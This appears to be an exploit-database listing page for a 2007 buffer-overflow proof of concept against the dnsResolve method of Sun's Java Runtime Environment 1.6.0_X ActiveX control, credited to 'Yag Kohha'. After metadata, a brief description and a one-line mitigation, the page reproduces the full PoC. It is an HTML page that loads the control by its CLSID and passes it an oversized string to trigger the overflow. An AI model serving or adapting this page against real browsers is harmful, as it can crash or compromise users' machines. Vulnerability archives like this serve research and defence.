header-logo
Suggest Exploit
vendor:
Java Runtime Environment
by:
Yag Kohha
7.5
CVSS
HIGH
Buffer Overflow
119
CWE
Product Name: Java Runtime Environment
Affected Version From: jre1.6.0_X
Affected Version To: jre1.6.0_X
Patch Exists: NO
Related CWE: Not provided
CPE: :j:java:runtime_environment:1.6.0_X
Metasploit:
Other Scripts:
Platforms Tested:
2007

Sun (jre1.6.0_X) isInstalled.dnsResolve function overflow PoC

The exploit triggers a buffer overflow in the isInstalled.dnsResolve function in Sun's JRE version 1.6.0_X. The provided code by Yag Kohha creates a string 'b' and continuously appends it to itself until its length exceeds 512*512. This causes the buffer overflow when the dnsResolve function is called with 'b' as the argument.

Mitigation:

Apply relevant patches and updates from Sun to fix the buffer overflow vulnerability.
Source

Exploit-DB raw data:

<html>
<body>
<center>
Sun (jre1.6.0_X) isInstalled.dnsResolve function overflow PoC<br>
Bug founded and code released by Yag Kohha. <br>
Greetz to: <br>
Shinnai, Str0ke <br>

</center>
<object classid="CLSID:5852F5ED-8BF4-11D4-A245-0080C6F74284"
id="target"></OBJECT>
<SCRIPT language="javascript">
var b = 'XXXX';
while (b.length <= 512*512) b+=b;
target.dnsResolve(b);
</script>
</body>
</html>

# milw0rm.com [2007-09-19]

Navigation

Suggest Exploit

Services By CQR